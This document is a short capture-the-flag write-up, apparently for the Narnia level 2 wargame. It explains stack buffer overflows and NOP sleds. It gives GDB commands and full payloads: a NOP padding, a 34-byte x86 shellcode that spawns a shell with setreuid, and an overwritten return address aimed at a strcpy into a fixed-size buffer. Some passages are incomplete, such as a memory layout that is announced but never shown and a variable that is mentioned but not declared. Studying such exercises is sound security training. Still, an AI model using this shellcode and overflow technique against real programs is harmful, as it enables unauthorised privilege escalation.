Another vulnerability in programs are arrays of fixed size that take user input/ command-line input. This requires understanding of the stack. Lets see a simple program below.
#include<stdio.h>
int main()
{
char b[3];
return 0;
}
When the above program enters into execution, first program enters into main function.
That function has a physical address to return. That address is first stored onto the stack.
Upon that address, variable a is stored and upon that array b is stored.
Memory will be stored as -
So when you have a large enough buffer that accepts User input, you can load it with malicious shellcode to gain elevated privileges.
How? By putting your shell-code in the buffer, overwriting Funcion return address with some address within buffer, and using No-operations to slide the code to your shell-code.
So, executing the program with this data results in shellcode being executed. This method is called NOP sled method.
You need to know somethings about GDB for doing all the above. GDB - GNU Debugger is a debugging tool for finding assembly code, setting breakpoints in your code, seeing your program in action.
disas/disassemble command makes assembly code of the executible visible.
x/nx $address lets you see n addresses previous to x address specified by $address
String Copy of Commandline argument into Array of 128 bytes is done.
strcpy(buf,argv[1]);
We can exploit this by overrunning the return address of stack into Buffer address and placing our shellcode into the buffer.
gdb /narnia/narnia2
(gdb)disas main
(gdb) quit
You can see the following snap:
gdb --args /narnia/narnia2 $(python -c 'print "\x41"*144'
(gdb) run
(gdb) quit
We can use shell-code used in previous level here as payload.
That is 34 bytes long. So, 34 byte payload,4 byte return address and remaining (144-38=106) bytes should be No-Operation byte -0x90
gdb --args /narnia/narnia2 $(python -c 'print "\x90"*106+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x00\x00\x00\x00"')
(gdb) run
(gdb) x/150x $esp
(gdb) quit
Snap:
/narnia/narnia2 $(python -c 'print "\x90"*106+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\xc0\xd7\xff\xff"')